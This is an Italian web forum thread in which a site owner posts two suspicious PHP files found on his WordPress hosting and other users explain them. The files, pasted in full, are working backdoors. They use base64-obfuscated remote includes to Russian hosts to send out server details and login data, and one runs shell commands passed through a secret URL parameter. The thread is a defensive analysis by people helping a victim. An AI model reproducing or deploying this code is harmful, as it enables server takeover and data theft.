[MER*A] file php sospetti
Clicca QUI per vedere il messaggio nel forum |
| Gighen |
ciao..
mi sono trovato dei file di certo non miei in nel mio spazio web...
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
-----------------------------------------
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
secondo voi cosa fanno??? |
| hannibal |
Non mi sono messo esattamente a decifrarli per benino, comunque ad una prima occhiata mi sembra una backdoor. Cercano di mascherare i loro sporchi parametri usando la codifica base 64, e usano tutto ciò per ricevere vari dati sul tuo server. Comunque se decodifichi
aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9
ti viene fuori http://bis.iframe.ru/master.php?r_addr=
File sospetto che punta a url russo = zappa via la webroot e inizia a interrogarti su come sono entrati. Personalmente ho due idee
1) [probabilità 10%] hanno bucato ftp e ti hanno uploadato quello schifo. Dubito, avrebbero potuto fare anche cose peggiori in questo caso.
2) [probabilità 90%] avevi sul server uno script php che permette l'upload e che soffre di una vulnerabilità grossa come una casa, i furbi sono quindi riusciti ad uploadare il file che volevano loro (dubito che tu permettessi l'upload di file .php) nella cartella che volevano loro (dubito che tu permettessi l'upload di file dandogli pure permessi di esecuzione)
Sempre a naso potrei dirti che si potrebbe trattare di un attacco fatto su larga scala (stile worm), il che sarebbe sensato se tu avessi avuto sul server una applicazione php parecchio nota e parecchio buggata (phpbb?) |
| yeah |
Nomi dei file? Sono stati collegati a pagine?
Il primo sembra inviare dati a http://bis.iframe.ru/master.php?r_addr= (decodificato da base64 dalla stringa in base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9"), dati che preleva forse da qualche modulo sul tuo sito.
Inoltre questa riga
code:
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
permette di eseguire un programma passato sull'URL
Anche il secondo probabilmente fa qualcosa di simile, ho dato solo una rapida lettura.
Ma sono stati collegati ad altre pagine?
[edit] Arrivato tardi :) |
| Gighen |
avevo capito capito fosse una cosa così ma non mi è ancora chiaro cosa esattamente...
ho scoperto il problema per una grandissima quantità di mail delivery failure da casella @ilmiodominio che non esistono.
Non mi pare di averperò trovato nulla che sendi emails, anche se quello che dice yeah del GET....
Per il momento ho rimosso tutti i file ed ho contattato l'assistenza clienti
[cmq niente PHPBB, solo wordpress :/] |
|
|
|
